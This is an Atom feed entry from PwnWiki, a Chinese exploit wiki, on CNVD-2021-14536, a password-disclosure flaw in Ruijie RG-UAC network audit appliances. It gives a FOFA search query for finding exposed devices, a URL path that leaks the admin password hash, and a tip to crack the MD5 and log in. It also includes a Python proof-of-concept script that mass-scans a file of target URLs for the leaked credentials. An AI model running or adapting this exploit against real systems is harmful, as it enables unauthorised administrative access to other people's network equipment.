<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Test123</id>
	<title>PwnWiki - User contributions [Chinese]</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Test123"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Special:Contributions/Test123"/>
	<updated>2026-04-09T14:57:30Z</updated>
	<subtitle>User contributions</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CNVD-2021-14536_%E9%8A%B3%E6%8D%B7RG-UAC%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2%E6%BC%8F%E6%B4%9E&amp;diff=235</id>
		<title>CNVD-2021-14536 銳捷RG-UAC信息洩露漏洞</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CNVD-2021-14536_%E9%8A%B3%E6%8D%B7RG-UAC%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2%E6%BC%8F%E6%B4%9E&amp;diff=235"/>
		<updated>2021-03-09T07:25:57Z</updated>

		<summary type="html">&lt;p&gt;Test123: /* FOFA */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;languages /&amp;gt;&lt;br /&gt;
==FOFA==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 title=&amp;quot;RG-UAC登录页面&amp;quot; &amp;amp;&amp;amp; body=&amp;quot;admin&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;translate&amp;gt;&amp;lt;!--T:1--&amp;gt; F12查看網頁源碼搜索關鍵字&amp;lt;/translate&amp;gt;&amp;lt;code&amp;gt;admin&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
或在URL后拼接/get_dkey.php?user=admin&lt;br /&gt;
&lt;br /&gt;
[[檔案:Cnvd1.jpg|400px]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;translate&amp;gt;&amp;lt;!--T:2--&amp;gt; 使用 password值 md5解密即可登錄。(用戶名admin)&amp;lt;/translate&amp;gt;&lt;br /&gt;
==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
import requests&lt;br /&gt;
import sys&lt;br /&gt;
import random&lt;br /&gt;
import re&lt;br /&gt;
from requests.packages.urllib3.exceptions import InsecureRequestWarning&lt;br /&gt;
&lt;br /&gt;
def title():&lt;br /&gt;
    print('+------------------------------------------')&lt;br /&gt;
    print('+  \033[34mPOC_Des: http://wiki.peiqi.tech                                   \033[0m')&lt;br /&gt;
    print('+  \033[34mVersion: 锐捷RG-UAC统一上网行为管理审计系统                             \033[0m')&lt;br /&gt;
    print('+  \033[36m使用格式:  python3 poc.py                                            \033[0m')&lt;br /&gt;
    print('+  \033[36mFile         &amp;gt;&amp;gt;&amp;gt; ip.txt                             \033[0m')&lt;br /&gt;
    print('+------------------------------------------')&lt;br /&gt;
&lt;br /&gt;
def POC_1(target_url):&lt;br /&gt;
    vuln_url = target_url&lt;br /&gt;
    headers = {&lt;br /&gt;
        &amp;quot;User-Agent&amp;quot;: &amp;quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36&amp;quot;,&lt;br /&gt;
    }&lt;br /&gt;
    try:&lt;br /&gt;
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)&lt;br /&gt;
        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)&lt;br /&gt;
        if &amp;quot;super_admin&amp;quot; in response.text and &amp;quot;password&amp;quot; in response.text and response.status_code == 200:&lt;br /&gt;
            print(&amp;quot;\033[32m[o] 目标 {}存在漏洞 ,F12查看源码获取密码md5值 \033[0m&amp;quot;.format(target_url))&lt;br /&gt;
        else:&lt;br /&gt;
            print(&amp;quot;\033[31m[x] 目标 {}不存在漏洞 \033[0m&amp;quot;.format(target_url))&lt;br /&gt;
    except Exception as e:&lt;br /&gt;
        print(&amp;quot;\033[31m[x] 目标 {}不存在漏洞 \033[0m&amp;quot;.format(target_url))&lt;br /&gt;
&lt;br /&gt;
def Scan(file_name):&lt;br /&gt;
    with open(file_name, &amp;quot;r&amp;quot;, encoding='utf8') as scan_url:&lt;br /&gt;
        for url in scan_url:&lt;br /&gt;
            if url[:4] != &amp;quot;http&amp;quot;:&lt;br /&gt;
                url = &amp;quot;http://&amp;quot; + url&lt;br /&gt;
            url = url.strip('\n')&lt;br /&gt;
            try:&lt;br /&gt;
                POC_1(url)&lt;br /&gt;
&lt;br /&gt;
            except Exception as e:&lt;br /&gt;
                print(&amp;quot;\033[31m[x] 请求报错 \033[0m&amp;quot;.format(e))&lt;br /&gt;
                continue&lt;br /&gt;
&lt;br /&gt;
if __name__ == '__main__':&lt;br /&gt;
    title()&lt;br /&gt;
    file_name  = str(input(&amp;quot;\033[35mPlease input Attack File\nFile &amp;gt;&amp;gt;&amp;gt; \033[0m&amp;quot;))&lt;br /&gt;
    Scan(file_name)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;translate&amp;gt;==參考== &amp;lt;!--T:3--&amp;gt;&amp;lt;/translate&amp;gt;&lt;br /&gt;
https://mp.weixin.qq.com/s/LbSPzt__mKdNN83RhJ2bwA&lt;/div&gt;</summary>
		<author><name>Test123</name></author>
	</entry>
</feed>